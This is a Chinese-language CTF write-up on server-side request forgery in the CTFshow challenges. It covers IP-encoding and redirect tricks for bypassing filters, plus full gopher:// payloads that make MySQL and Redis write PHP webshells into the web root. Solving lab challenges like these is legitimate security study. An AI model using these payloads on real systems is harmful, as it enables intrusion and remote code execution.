SSRF

SSRF

绕过

添加端口

短网址

指向任意IP的域名xip.io

IP限制绕过

十进制转换
八进制转换
十六进制转换
不同进制组合转换

302跳转

dict://

file://

gopher://

http://www.baidu.com@127.0.0.1

gopher://

gopher是一个互联网上使用的分布型的文件搜集获取网络协议

gopher协议支持发出GET、POST请求：可以先截获get请求包和post请求包，在构成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)

gopher对redis利用

web ssrf->gopher

redis 没密码

cron 反弹shell

CTFSHOW-SSRF - 图1

gopher对mysql利用

ssrf

mysql 无密码

web352

进制绕过

十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式，还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php

web353

进制绕过

web354

302跳转

<?php
header("Location:http://127.0.0.1/flag.php");

DNS-Rebinding攻击绕过

url=http://xxxx/flag.php 去ceye.io注册绑定127.0.0.1然后记得前面加r

//A记录是127.0.0.1    url=http://sudo.cc/flag.php

web355

host小于5

url=http://0/flag.php

web356

host小于3

url=http://0/flag.php

web357

关键代码

if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}

FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP（比如 255.255.255.255）
FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP（比如 2001:0db8:85a3:08d3:1319:8a2e:0370:7334）
FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP （比如 192.168.0.1）
FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。

用302跳转即可绕过

web358

代码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

parse_url解析问题

url=http://ctf.@127.0.0.1/flag.php?show

CTFSHOW-SSRF - 图2

web359

利用exp生成payload

CTFSHOW-SSRF - 图3

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4b%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%61%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%68%75%61%68%75%61%2e%70%68%70%27%01%00%00%00%01

web360

打redis

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

SSRF-ME

<?php 
error_reporting(0);
highlight_file(__FILE__);
$url=$_GET['url'];
if(preg_match('/127.0.0.1|flag|dict|file|ftp/i',$url)){
  die('想都别想');
}//read.php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
echo $output;
curl_close($ch);

先读取read.php //?url=http://127.1/read.php

<?php
if('127.0.0.1'!=$_SERVER['REMOTE_ADDR']){
    die('Allow local only');
}
if('GET' === $_SERVER['REQUEST_METHOD']){
  highlight_file(__FILE__);
  die('Invalid request mode');
}

$filename=$_POST['name'];
if(preg_match('/..\//',$filename)){
    die('nonono');
}
echo file_get_contents(urldecode($filename));

需要post请求name发送值达到任意文件读取

if(preg_match('/..\//',$filename)){
    die('nonono');
}

用二次编码绕过 (有urldecode函数)

利用gopher协议发送post请求报文

构造post请求

POST /read.php HTTP/1.1
Host: 127.1:
Content-Length: 50
Content-Type: application/x-www-form-urlencoded

name=/flag

url会解析一次 curl会解析一次编码

构造payload: (等于号后面的/flag需要进行四次url编码其余两次)

?url=gopher://127.1:80/_POST%2520%252Fread.php%2520HTTP%252F1.1%250AHost%253A%2520127.1%253A80%250AContent-Length%253A%252050%250AContent-Type%253A%2520application%252Fx-www-form-urlencoded%250A%250Aname%253D%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%32%25%32%35%25%33%36%25%33%36%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%33%25%33%36%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%36%25%33%33%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%33%25%33%37